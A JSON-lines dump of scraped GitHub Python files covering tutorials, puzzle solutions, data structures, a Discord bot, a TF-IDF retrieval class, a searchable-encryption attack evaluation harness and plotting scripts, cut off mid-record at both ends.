1\n        pass\n\n    else:\n        # runs when no exception occurred\n        print('没有出错时执行')\n        pass\n\n    finally:\n\n        # always runs in the end\n        print('最终都会执行')\n        pass\n\n    # raise Exception(\"主动触发异常\")\n\n\nprint(i)\n\n'''\n\n\n# custom exception\n\nclass MyException(Exception):\n\n    def __init__(self,message):\n        self.message = message\n\n\n\n    def __str__(self):\n        return self.message\n\n\n\n\nobj = MyException(\"my exception\")\n\nprint(obj)\n\n\ntry:\n\n    raise MyException(\"主动触发的异常错误\")\n\nexcept MyException as e:\n\n    print(e) # calls the __str__ method and prints its return value\n\n\n\n# assert: a condition assertion that forces the condition to hold and raises if it does not; it can be caught, but usually is not\n\n# assert 1==3\n","repo_name":"flyalt/Exywt","sub_path":"Exywt/异常处理/异常处理.py","file_name":"异常处理.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"5717388353","text":"from collections import deque\nfrom dataclasses import dataclass\nfrom inspect import stack\nfrom advent.util.points import Point3D, Vector3D, surrounding_3d_points\nfrom ..utils import iterlines, Range, Window\n\n@dataclass\nclass Zone(Window):\n    def __init__(self):\n        self.z_range = Range()\n    \n    def push(self, v):\n        super().push(v)\n        self.z_range.push(v)\n\n    def extend(self, p3):\n        super().extend(p3)\n        self.z_range.extend(p3.z)\n    \n    def __contains__(self, p3):\n        if not super().__contains__(p3):\n            return False\n        return p3.z in self.z_range\n\ndef parse_input(is_test):\n    points = set()\n    zone = Zone()\n    for line in iterlines(18, is_test):\n        coords = tuple(map(int, line.split(\",\")))\n        p = Point3D(*coords)\n        points.add(p)\n        zone.extend(p)\n    return points, zone\n\ndef surface_area(points, outside=None):\n    sa = 0\n    for point in points:\n        for next_point in surrounding_3d_points(point):\n            if not next_point in points:\n                if outside is None or next_point in outside:\n                    sa += 1\n    return sa\n    \ndef make_steam(zone, points):\n    seen = set()\n    touching = set()\n    zone.push(1)\n    q = deque([\n        Point3D(\n            zone.x_range.rmin,\n            zone.y_range.rmin,\n            zone.z_range.rmin,\n        )\n    ])\n    while q:\n        current_point = q.pop()\n        for next_point in surrounding_3d_points(current_point):\n            if next_point not in zone:\n                continue\n            if next_point in seen:\n                continue\n            if next_point in points:\n                touching.add(current_point)\n                continue\n            q.append(next_point)\n        seen.add(current_point)\n    return touching\n\n    \n    \n    \n\ndef part1(is_test):\n    points, _ = parse_input(is_test)\n    sa = surface_area(points)\n    print(sa)\n\n\ndef part2(is_test):\n    points, zone = parse_input(is_test)\n    steam = make_steam(zone, points)\n    sa = surface_area(points, steam)\n    print(sa)\n    \n\npart1(True)\npart1(False)\npart2(True)\npart2(False)","repo_name":"jansenk/advent-of-code","sub_path":"advent/2022/solutions/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"35708211710","text":"from common.base_modules.candidate_movement import CandidateMovement\nfrom common.base_modules.politics_vector import PoliticsVector\n\nclass BasicCandidateMovement(CandidateMovement):\n\n    #Move the candidate to the closest point in the tolerable radius to the centroid of the voters.\n    def move(self, candidate, district):\n        tolerable_radius = 0.1\n        centroid_x = 0\n        centroid_y = 0\n        for voter in district.voters:\n            centroid_x += voter.views.get(0) / len(district.voters)\n            centroid_y += voter.views.get(1) / len(district.voters)\n        distance = candidate.views_base.distance(PoliticsVector(2, [centroid_x, centroid_y]))\n        if distance <= tolerable_radius:\n            candidate.views_current = 
PoliticsVector(2, [centroid_x, centroid_y])\n        else:\n            ratio = tolerable_radius / distance\n            new_x = candidate.views_base.get(0) + (centroid_x - candidate.views_base.get(0)) * ratio\n            new_y = candidate.views_base.get(1) + (centroid_y - candidate.views_base.get(1)) * ratio\n            candidate.views_current = PoliticsVector(2, [new_x, new_y])","repo_name":"steventhynes/voting-system-simulator","sub_path":"common/candidate_movements.py","file_name":"candidate_movements.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"27440924510","text":"import unittest\n\nfrom specex.sources import detect_from_cube\n\nfrom test import make_synt_cube\n\n\nclass TestSourceDetection(unittest.TestCase):\n\n    reg_file, cat_file, cube_file = make_synt_cube.main(overwrite=False)\n\n    def test_extract_sources(self):\n        detect_from_cube([self.cube_file])\n\n\nif __name__ == '__main__':\n    mytest = TestSourceDetection()\n    mytest.test_extract_sources()\n","repo_name":"mauritiusdadd/python-specex","sub_path":"test/test_sources.py","file_name":"test_sources.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"2978529709","text":"class Node:\n    def __init__(self, elem):\n        self.elem = elem\n        self.next = None\n\n    def __repr__(self):\n        return str(self.elem)\n\nclass CircularList:\n    def __init__(self, node = None):\n        self.rear = node\n        self.head = node\n        if node:\n            node.next = node\n    \n    def is_empty(self):\n        return self.rear == None\n\n    def length(self):\n        if self.is_empty():\n            return 0\n        else:\n            cur = self.rear\n            count = 1\n            while cur.next != self.rear:\n                count += 1\n                cur = cur.next\n            return count\n\n    def append(self, item):\n        node = Node(item)\n        if self.is_empty():\n            self.head = node\n            self.rear = node\n            node.next = node\n        else:\n            node.next = self.rear.next \n            self.rear.next = node\n            self.rear = node\n    \n\n    def prepend(self, item):\n        node = Node(item)\n        if self.is_empty():\n            self.head = node\n            self.rear = node\n            node.next = node\n        else:\n            node.next = self.head\n            self.head = node\n            self.rear.next = node\n    \n    \n\n    def delete(self, pos):\n        # delete the node at 1-based position pos\n        if self.is_empty():\n            return\n        cur = self.head\n        pre = self.rear\n        cnt = 1\n        while True:\n            if pos == cnt:\n                if cur == self.head and cur == self.rear:\n                    # deleting the only node empties the list\n                    self.head = None\n                    self.rear = None\n                else:\n                    pre.next = cur.next\n                    if cur == self.head:\n                        self.head = cur.next\n                    if cur == self.rear:\n                        self.rear = pre\n                return\n            pre = cur\n            cur = cur.next\n            cnt += 1\n            if cur == self.head:\n                # wrapped all the way around: pos is out of range\n                return\n    \n    def printList(self):\n        if self.is_empty():\n            return\n        p = self.rear.next\n        print(\"Head\", end=' ')\n        while True:\n            print(\"-->\", p.elem, end=' ')\n            if p is self.rear:\n                break\n            p = p.next\n        print(\"--> Rear\")\n\n","repo_name":"cyndereN/Python-Learning","sub_path":"UCL/Algorithms/Exercises/circular_lists.py","file_name":"circular_lists.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4603362424","text":"import http.client\nimport json\n\nconn = http.client.HTTPSConnection(\"127.0.0.1\", 8088)\npayload = json.dumps({\n    \"ime\": \"Luka\",\n    \"prezime\": \"Stankovic\",\n    \"username\": \"lstankovic16\",\n    \"smer\": \"RM\",\n    \"predmeti\": [\n        {\n            \"ime\": \"OperativniSistemi\",\n            \"espb\": \"8\"\n        },\n        {\n            \"ime\": \"DigitalneKomunikacije\",\n            \"espb\": \"8\"\n        },\n        {\n            \"ime\": \"PrimenjeniDistribuiraniSistemi\",\n            \"espb\": \"6\"\n        },\n        {\n            \"ime\": \"DigitalnaObradaSignala\",\n            \"espb\": \"6\"\n        }\n    
]\n})\nheaders = {\n 'Content-Type': 'application/json'\n}\nconn.request(\"POST\", \"/users\", payload, headers)\nres = conn.getresponse()\ndata = res.read()\nprint(data.decode(\"utf-8\"))","repo_name":"GentleWalker/DockerFax","sub_path":"client/postRequest.py","file_name":"postRequest.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26679713519","text":"from util import *\nimport numpy as np\nfrom numpy import dot\nfrom numpy.linalg import norm\n# Add your import statements here\nimport operator\nimport datetime as dt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nclass InformationRetrieval():\n\n def __init__(self):\n self.index = None\n\n def buildIndex(self, docs, docIDs):\n \"\"\"\n Builds the document index in terms of the document\n IDs and stores it in the 'index' class variable\n\n Parameters\n ----------\n arg1 : list\n A list of lists of lists where each sub-list is\n a document and each sub-sub-list is a sentence of the document\n arg2 : list\n A list of integers denoting IDs of the documents\n Returns\n -------\n None\n \"\"\"\n # print('-'*30,'\\n', docIDs,'\\n', '-'*30)\n start = dt.datetime.now()\n index = None\n D = len(docs)\n # print(\"len(docs)\",len(docs))\n \n list_of_words = []\n \n for document in docs:\n for sentence in document:\n for word in sentence:\n list_of_words.append(word) #this can have repetition of words \n\n self.list_unique = list(set(list_of_words))\n\n # print('unique_list operation took:', dt.datetime.now()-start)\n\n start = dt.datetime.now()\n df = np.zeros(len(self.list_unique)) # df(i) is number of docs containing term i, used for calculating IDF \n \n TD_matrix = np.zeros([len(self.list_unique),len(docs)]) #term-document matrix\n \n \n for j, doc in enumerate(docs): # iterate over documents\n for k, sentence in enumerate(doc): # iterate over sentences for a document\n for word in sentence:\n # for i, unique_word in enumerate(self.list_unique): # iterate over terms\n # if unique_word == word:\n # TD_matrix[i,j] += 1 # update term frequency\n # break\n try:\n TD_matrix[self.list_unique.index(word),j] += 1\n except:\n temp_skip = 0\n \n df = np.sum(TD_matrix > 0, axis=1)\n\n self.IDF = np.log(D/df) \n # print('IDF operation took:', dt.datetime.now()-start)\n\n start = dt.datetime.now()\n\n self.doc_weights = np.zeros([len(self.list_unique),len(docs)])\n # print(\"check if 8835: \", len(self.doc_weights[:,0]))\n \n for i in range(len(self.list_unique)):\n self.doc_weights[i,:] = self.IDF[i]*TD_matrix[i,:] # vector weights for each document \n \n\n index = {key: None for key in docIDs} # initialize dictionary with keys as doc_IDs\n \n for j in range(len(docs)): \n index[docIDs[j]] = self.doc_weights[:,j] # update dict-values with weight vector for corresponding docIDs \n \n # print(\"len(self.doc_weights[:][0]\", len(self.doc_weights[:,0])) \n # print('doc_weights operation took:', dt.datetime.now()-start)\n self.index = index\n \n\n def rank(self, queries):\n \"\"\"\n Rank the documents according to relevance for each query\n\n Parameters\n ----------\n arg1 : list\n A list of lists of lists where each sub-list is a query and\n each sub-sub-list is a sentence of the query\n \n\n Returns\n -------\n list\n A list of lists of integers where the ith sub-list is a list of IDs\n of documents in their predicted order of relevance to the ith query\n \"\"\"\n\n # we have already calculated the document vectors in previous function\n start = 
dt.datetime.now()\n TQ_matrix = np.zeros([len(self.list_unique),len(queries)]) # term frequency matrix (for each query in list queries)\n \n for i, unique_word in enumerate(self.list_unique):\n for j, query in enumerate(queries): # iterate over all queries\n for k, sentence in enumerate(query): # iterate over sentences for a query\n for word in sentence:\n if unique_word == word:\n TQ_matrix[i,j] += 1 \n\n # print('TQ operation took:', dt.datetime.now()-start)\n start = dt.datetime.now()\n self.query_weights = np.zeros([len(self.list_unique),len(queries)])\n \n for i, unique_word in enumerate(self.list_unique):\n self.query_weights[i,:] = self.IDF[i]*TQ_matrix[i,:] # vector weights for each query \n \n id_docs = list(self.index.keys())\n \n \n doc_IDs_ordered = list(range(len(queries)))\n # print('Pre-Ranking operation took:', dt.datetime.now()-start)\n start = dt.datetime.now()\n # print('length of queries:', len(queries))\n for j in range(len(queries)):\n dict_cosine = {key: None for key in id_docs} # given ONE query, stores cosine measures for between query and all docs\n # for i in range(len(self.index)):\n # a = self.index[id_docs[i]]\n # b = self.query_weights[:,j]\n # dict_cosine[id_docs[i]] = dot(a,b)/(norm(a)*norm(b))\n for doc_id, doc_vector in self.index.items():\n a = doc_vector\n b = self.query_weights[:,j]\n dict_cosine[doc_id] = dot(a,b)/(norm(a)*norm(b))\n \n dc_sort = sorted(dict_cosine.items(),key = operator.itemgetter(1),reverse = True)\n # temp = [x for x, _ in dc_sort]\n # for k in range(len(dc_sort)):\n # temp.append(dc_sort[k][0]) # take only the keys (doc IDs) and store in temp\n \n \n doc_IDs_ordered[j] = [x for x, _ in dc_sort] #sorted docIDs stored corresponding to that query \n # print('Ranking operation took:', dt.datetime.now()-start)\n\n # doc_IDs_ordered = []\n\n #Fill in code here\n\n return doc_IDs_ordered\n\n\n\n\n","repo_name":"Shania99/CS6730-Natural-Language-Processing","sub_path":"Assignment-1/informationRetrieval.py","file_name":"informationRetrieval.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3866716684","text":"import os\nimport discord.abc\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv(\"DISCORD_TOKEN\")\nGUILD = os.getenv(\"DISCORD_GUILD\")\nintents = discord.Intents.default()\nintents.members = True\nintents.message_content = True\nbot = commands.Bot(command_prefix=\"$\", intents=intents)\n# bot event (when its ready)\n\n\n@bot.event\nasync def on_ready():\n for guild in bot.guilds:\n if guild.name == GUILD:\n break\n\n print(\n f\"{bot.user} is connected to the following guild:\\n\"\n f\"{guild.name}(id: {guild.id})\"\n )\n\n members = \"\\n - \".join([member.name for member in guild.members])\n print(f\"Guild Members:\\n - {members}\")\n\n\n@bot.event\nasync def on_message(message):\n await bot.process_commands(message)\n if message.author == bot.user:\n return\n\n steve_jobs_quote = \"Innovation distinguishes between a leader and a follower.\"\n\n if message.content == \"steve\":\n await message.channel.send(steve_jobs_quote)\n\n\n@bot.command()\nasync def test(ctx, *args):\n \"\"\"Tells you a member's roles.\"\"\"\n arguments = \" \".join(args)\n await ctx.send(arguments)\n\n\n@bot.command()\nasync def add(ctx, a: int, b: int):\n await ctx.send(a + 
b)\n\n\nbot.run(TOKEN)\n","repo_name":"vazqueztomas/discord_bot","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30883586510","text":"from manimlib.imports import *\nimport numpy as np\n\nclass integral(GraphScene):\n    CONFIG = {\n        \"x_max\" : 20,\n        \"y_max\" : 10,\n        \"y_axis_height\" : 5,\n        \"init_dx\" : 0.5,\n    }\n\n\n    def construct(self):\n        self.show_function_graph()\n\n\n    def show_function_graph(self):\n        self.setup_axes(animate = True)\n\n        # math functions\n\n        def func(x):\n            # e^(0.1x) * sin(x); np.exp is used instead of the rough 2.71 approximation of e\n            return np.exp(0.1*x)*np.sin(x)\n\n        # graph\n        graph = self.get_graph(func , x_min = -1 , x_max = 20 )\n\n        graph.set_color(YELLOW)\n        kwargs = {\n            \"x_min\" : 5,\n            \"x_max\" : 15,\n            \"fill_opacity\" : 0.75,\n            \"stroke_width\" : 0.25,\n        }\n\n        self.play(ShowCreation(graph), run_time=5) # manim's keyword is run_time; 'runtime' was silently ignored\n        self.wait(1)\n\n        riemann_rectangles_list = self.get_riemann_rectangles_list(\n            graph,\n            6,\n            max_dx=self.init_dx,\n            power_base=2,\n            start_color=PURPLE,\n            end_color=ORANGE,\n            **kwargs\n        )\n\n        self.play(ShowCreation(riemann_rectangles_list[0]))\n        self.wait()\n\n        for r in range(1, len(riemann_rectangles_list)):\n            self.play(ReplacementTransform(riemann_rectangles_list[r-1], riemann_rectangles_list[r]))\n\n        self.wait(2)\n\n        self.play(*[Uncreate(item) for item in riemann_rectangles_list])\n        self.play(Uncreate(graph))\n        self.play(*[FadeOut(i) for i in self.axes])\n        self.wait(4)\n\n        group_dots = VGroup(*[Dot() for _ in range(3)])\n        group_dots.arrange_submobjects(RIGHT)\n\n        for dot in group_dots:\n            self.play(FadeIn(dot))\n\n        self.wait()\n","repo_name":"arhantbararia/Math-Animation-Repo","sub_path":"integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22435722035","text":"# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution(object):\n    def deleteDuplicates(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: ListNode\n        \"\"\"\n        l = ListNode() # dummy node placed in front of head\n        curr = l\n        l.next = head\n        while head:\n            val = head.val\n            while head is not None and val == head.val: # skip the whole run of equal values\n                head = head.next\n            if l.next.next == head: # the run had length 1, so keep the node\n                l = l.next\n            else: # the value was duplicated, so splice the whole run out\n                l.next = head\n        return curr.next\n","repo_name":"muskaan-codes/leetcoding-challenges","sub_path":"JanuaryCodingChallenge/Day-5-Remove-Duplicates-from-Sorted-List-II.py","file_name":"Day-5-Remove-Duplicates-from-Sorted-List-II.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38933941355","text":"from run_single_attack import *\r\nimport pickle\r\nimport os\r\nimport numpy as np # used for the final averaging; made explicit rather than relying on the star import\r\nfrom tqdm import tqdm\r\nfrom cal_acc import calculate_acc_weighted\r\n\r\n\r\n\r\ndef test_durability(test_times,kws_uni_size,datasets = [\"enron\",\"lucene\"]):\r\n    if not os.path.exists(\"./results\"):\r\n        os.makedirs(\"./results\")\r\n    if not os.path.exists(\"./results/test_durability\"):\r\n        os.makedirs(\"./results/test_durability\")\r\n\r\n    for dataset in datasets:\r\n        if dataset == \"wiki\":\r\n            Eta = [2,10,20,30]\r\n            observed_time = 30\r\n            query_number_per_week = 5000\r\n        else:\r\n            Eta = [10,50,100,150]\r\n            observed_time = 50\r\n            query_number_per_week = 2000\r\n        Acc_Eta = []\r\n        for _ in tqdm(range(test_times)):\r\n            acc_Eta 
= []\r\n for eta in Eta:\r\n attack_params = {\"alg\":\"Ours\",\"alpha\":0.3,\"step\":3,\\\r\n \"baseRec\":100,\"confRec\":50,\\\r\n \"beta\":0.8,\"no_F\":None,\"refinespeed\":15}\r\n result = run_single_attack(kws_uni_size,kws_uni_size,\"sorted\",query_number_per_week,observed_time,eta,dataset,\\\r\n {\"alg\":None},attack_params)\r\n data_for_acc_cal = result[\"data_for_acc_cal\"]\r\n tdid_2_kwid = result[\"results\"][1]\r\n correct_count,acc,correct_id,wrong_id=calculate_acc_weighted(data_for_acc_cal,tdid_2_kwid)\r\n print(\"time offset(weeks):\",eta,\"| Acc: \",acc)\r\n acc_Eta.append(acc)\r\n Acc_Eta.append(acc_Eta)\r\n with open(\"results/test_durability/\"+dataset+\".pkl\", \"wb\") as tf:\r\n pickle.dump([Eta,Acc_Eta],tf)\r\n print(np.average(np.array(Acc_Eta),axis=0))\r\n\r\ntest_durability(30,1000,[\"enron\",\"lucene\"])\r\ntest_durability(30,3000,[\"wiki\"])\r\n \r\n","repo_name":"JigsawAttack/JigsawAttack","sub_path":"test_durability.py","file_name":"test_durability.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14932513195","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.action import Action # noqa: F401,E501\nfrom swagger_server.models.meta_data import MetaData # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass Updatealert(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, id: str=None, info: str=None, is_ack: bool=None, is_read: bool=None, is_discarded: bool=None, is_muted: bool=None, meta_data: MetaData=None, action: Action=None): # noqa: E501\n \"\"\"Updatealert - a model defined in Swagger\n\n :param id: The id of this Updatealert. # noqa: E501\n :type id: str\n :param info: The info of this Updatealert. # noqa: E501\n :type info: str\n :param is_ack: The is_ack of this Updatealert. # noqa: E501\n :type is_ack: bool\n :param is_read: The is_read of this Updatealert. # noqa: E501\n :type is_read: bool\n :param is_discarded: The is_discarded of this Updatealert. # noqa: E501\n :type is_discarded: bool\n :param is_muted: The is_muted of this Updatealert. # noqa: E501\n :type is_muted: bool\n :param meta_data: The meta_data of this Updatealert. # noqa: E501\n :type meta_data: MetaData\n :param action: The action of this Updatealert. # noqa: E501\n :type action: Action\n \"\"\"\n self.swagger_types = {\n 'id': str,\n 'info': str,\n 'is_ack': bool,\n 'is_read': bool,\n 'is_discarded': bool,\n 'is_muted': bool,\n 'meta_data': MetaData,\n 'action': Action\n }\n\n self.attribute_map = {\n 'id': 'id',\n 'info': 'info',\n 'is_ack': 'isAck',\n 'is_read': 'isRead',\n 'is_discarded': 'isDiscarded',\n 'is_muted': 'isMuted',\n 'meta_data': 'metaData',\n 'action': 'action'\n }\n self._id = id\n self._info = info\n self._is_ack = is_ack\n self._is_read = is_read\n self._is_discarded = is_discarded\n self._is_muted = is_muted\n self._meta_data = meta_data\n self._action = action\n\n @classmethod\n def from_dict(cls, dikt) -> 'Updatealert':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The updatealert of this Updatealert. 
# noqa: E501\n        :rtype: Updatealert\n        \"\"\"\n        return util.deserialize_model(dikt, cls)\n\n    @property\n    def id(self) -> str:\n        \"\"\"Gets the id of this Updatealert.\n\n        id of the alert  # noqa: E501\n\n        :return: The id of this Updatealert.\n        :rtype: str\n        \"\"\"\n        return self._id\n\n    @id.setter\n    def id(self, id: str):\n        \"\"\"Sets the id of this Updatealert.\n\n        id of the alert  # noqa: E501\n\n        :param id: The id of this Updatealert.\n        :type id: str\n        \"\"\"\n        if id is None:\n            raise ValueError(\"Invalid value for `id`, must not be `None`\")  # noqa: E501\n\n        self._id = id\n\n    @property\n    def info(self) -> str:\n        \"\"\"Gets the info of this Updatealert.\n\n        info of the alert  # noqa: E501\n\n        :return: The info of this Updatealert.\n        :rtype: str\n        \"\"\"\n        return self._info\n\n    @info.setter\n    def info(self, info: str):\n        \"\"\"Sets the info of this Updatealert.\n\n        info of the alert  # noqa: E501\n\n        :param info: The info of this Updatealert.\n        :type info: str\n        \"\"\"\n\n        self._info = info\n\n    @property\n    def is_ack(self) -> bool:\n        \"\"\"Gets the is_ack of this Updatealert.\n\n        acknowledgement  # noqa: E501\n\n        :return: The is_ack of this Updatealert.\n        :rtype: bool\n        \"\"\"\n        return self._is_ack\n\n    @is_ack.setter\n    def is_ack(self, is_ack: bool):\n        \"\"\"Sets the is_ack of this Updatealert.\n\n        acknowledgement  # noqa: E501\n\n        :param is_ack: The is_ack of this Updatealert.\n        :type is_ack: bool\n        \"\"\"\n\n        self._is_ack = is_ack\n\n    @property\n    def is_read(self) -> bool:\n        \"\"\"Gets the is_read of this Updatealert.\n\n        read or not  # noqa: E501\n\n        :return: The is_read of this Updatealert.\n        :rtype: bool\n        \"\"\"\n        return self._is_read\n\n    @is_read.setter\n    def is_read(self, is_read: bool):\n        \"\"\"Sets the is_read of this Updatealert.\n\n        read or not  # noqa: E501\n\n        :param is_read: The is_read of this Updatealert.\n        :type is_read: bool\n        \"\"\"\n\n        self._is_read = is_read\n\n    @property\n    def is_discarded(self) -> bool:\n        \"\"\"Gets the is_discarded of this Updatealert.\n\n        is it discarded or not  # noqa: E501\n\n        :return: The is_discarded of this Updatealert.\n        :rtype: bool\n        \"\"\"\n        return self._is_discarded\n\n    @is_discarded.setter\n    def is_discarded(self, is_discarded: bool):\n        \"\"\"Sets the is_discarded of this Updatealert.\n\n        is it discarded or not  # noqa: E501\n\n        :param is_discarded: The is_discarded of this Updatealert.\n        :type is_discarded: bool\n        \"\"\"\n\n        self._is_discarded = is_discarded\n\n    @property\n    def is_muted(self) -> bool:\n        \"\"\"Gets the is_muted of this Updatealert.\n\n        whether muted or not  # noqa: E501\n\n        :return: The is_muted of this Updatealert.\n        :rtype: bool\n        \"\"\"\n        return self._is_muted\n\n    @is_muted.setter\n    def is_muted(self, is_muted: bool):\n        \"\"\"Sets the is_muted of this Updatealert.\n\n        whether muted or not  # noqa: E501\n\n        :param is_muted: The is_muted of this Updatealert.\n        :type is_muted: bool\n        \"\"\"\n\n        self._is_muted = is_muted\n\n    @property\n    def meta_data(self) -> MetaData:\n        \"\"\"Gets the meta_data of this Updatealert.\n\n\n        :return: The meta_data of this Updatealert.\n        :rtype: MetaData\n        \"\"\"\n        return self._meta_data\n\n    @meta_data.setter\n    def meta_data(self, meta_data: MetaData):\n        \"\"\"Sets the meta_data of this Updatealert.\n\n\n        :param meta_data: The meta_data of this Updatealert.\n        :type meta_data: MetaData\n        \"\"\"\n\n        self._meta_data = meta_data\n\n    @property\n    def action(self) -> Action:\n        \"\"\"Gets the action of this Updatealert.\n\n\n        :return: The action of this Updatealert.\n        :rtype: Action\n        \"\"\"\n        return 
self._action\n\n @action.setter\n def action(self, action: Action):\n \"\"\"Sets the action of this Updatealert.\n\n\n :param action: The action of this Updatealert.\n :type action: Action\n \"\"\"\n\n self._action = action\n","repo_name":"Surya2709/FlaskSwaggerDemo","sub_path":"swagger_server/models/updatealert.py","file_name":"updatealert.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14059059346","text":"#!/usr/bin/python3\n\"\"\"A scripts that sends a post request\"\"\"\nimport sys\nimport requests\n\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n values = {\"email\": sys.argv[2]}\n\n response = requests.post(url, data=values)\n print(response.text)\n","repo_name":"UmarFarukA/alx-higher_level_programming","sub_path":"0x11-python-network_1/6-post_email.py","file_name":"6-post_email.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23387269277","text":"#!/home/raul/miniconda3/envs/py27/bin/python -W ignore::VisibleDeprecationWarning\n\n\"\"\"\nCreated on Wed Jul 20 11:22:43 2016\n\n@author: raul\n\"\"\"\nimport numpy as np\nimport sounding as so\nimport Meteoframes as mf\nimport matplotlib.pyplot as plt\nfrom rv_utilities import discrete_cmap\nfrom matplotlib import rcParams\n\nrcParams['xtick.labelsize'] = 15\nrcParams['ytick.labelsize'] = 15\nrcParams['legend.fontsize'] = 15\nrcParams['axes.labelsize'] = 15\nrcParams['legend.handletextpad'] = 0.2\nrcParams['mathtext.default'] = 'sf'\n\nscale=1.2\nfig,axes = plt.subplots(2,1,sharex=True,figsize=(5*scale,10*scale))\naxes[0].set_gid('(a) 23-24Jan01')\naxes[1].set_gid('(b) 17Feb01')\n\nnobs=('n=7','n=11')\n\ninfiles3,_ = so.get_sounding_files('3', homedir='/localdata')\ninfiles7,_ = so.get_sounding_files('7', homedir='/localdata')\n\ncmap = discrete_cmap(7, base_cmap='Set1')\ncolor=(cmap(0),cmap(1))\n\ninfiles=(infiles3,infiles7)\n\n\nfor n,ax in enumerate(axes):\n\n first = True\n for f in infiles[n]:\n df = mf.parse_sounding2(f)\n x = np.expand_dims(df.bvf_moist.values,axis=1)*10000\n y = np.expand_dims(df.index.values,axis=1)\n ax.plot(x,y,color=color[n],lw=0.5)\n top = 2000 # [m]\n top_idx = np.where(y == top)[0]\n if first is True: \n prof = x[:top_idx]\n first = False\n else:\n prof = np.hstack((prof,x[:top_idx]))\n meanx = np.expand_dims(np.nanmean(prof,axis=1),axis=1)\n y2 = y[:top_idx]\n ax.plot(meanx,y2,color=color[n],lw=3)\n xpos = 0.08\n ax.text(xpos,0.9,ax.get_gid(),\n fontsize=15,\n weight='bold',\n transform=ax.transAxes,\n )\n ax.text(xpos+0.07,0.85,nobs[n],\n fontsize=15,\n weight='bold',\n transform=ax.transAxes, \n ) \n \n ax.set_xlim([-4,4])\n ax.set_ylim([0,2000])\n ax.axvline(0,color='k',linestyle=':',lw=3)\n \naxes[0].set_ylabel('Altitude MSL [m]')\naxes[1].set_xlabel(r'$N_{m}^{2} [x10^{-4} s^{-2}]$')\n#plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n# ncol=2, mode=\"expand\", borderaxespad=0.)\n\nplt.subplots_adjust(hspace=0.05)\n\n#plt.show()\n\nfname='/home/raul/Desktop/fig_N2.png'\nplt.savefig(fname, dpi=150, format='png',papertype='letter',\n bbox_inches='tight')\n","repo_name":"rvalenzuelar/sounding_vis","sub_path":"figure_bvf_case_3_and_7.py","file_name":"figure_bvf_case_3_and_7.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18746631913","text":"# 
https://leetcode.com/problems/find-the-highest-altitude/\n\n\"\"\"\n\nProblem Description \n\nThere is a biker going on a road trip. The road trip consists of n + 1 points at different altitudes. The biker starts his trip on point 0 with altitude equal 0.\n\nYou are given an integer array gain of length n where gain[i] is the net gain in altitude between points i and i + 1 for all \n(0 <= i < n). Return the highest altitude of a point.\n\n\"\"\"\n\n# Time Complexity        Space Complexity\n# O(n)\t\t\t\t      O(n)\n\nfrom typing import List # added so the file also runs standalone; LeetCode provides this implicitly\n\nclass Solution:\n    def largestAltitude(self, gain: List[int]) -> int:\n        total = 0 # named 'total' to avoid shadowing the builtin sum()\n        altitude = [0]\n        for each_gain in gain:\n            total += each_gain\n            altitude.append(total)\n        return max(altitude)\n","repo_name":"SanthoshS20/Leet_Code_Problems_Solution","sub_path":"Python Language/ProblemID_1732.py","file_name":"ProblemID_1732.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20131034951","text":"# Author: Nam Tran\n# Date: 2020-10-21\n\n# This code creates the two distribution plots (horizontal and vertical), requiring two files as input:\n# horizontal_prediction_error and vertical_prediction_error. These two input files can be generated \n# from neural_network.py by writing out the error. \n\nimport numpy as np\nimport csv\nimport random\nfrom scipy import stats\nimport seaborn as sns\nimport matplotlib.pyplot as 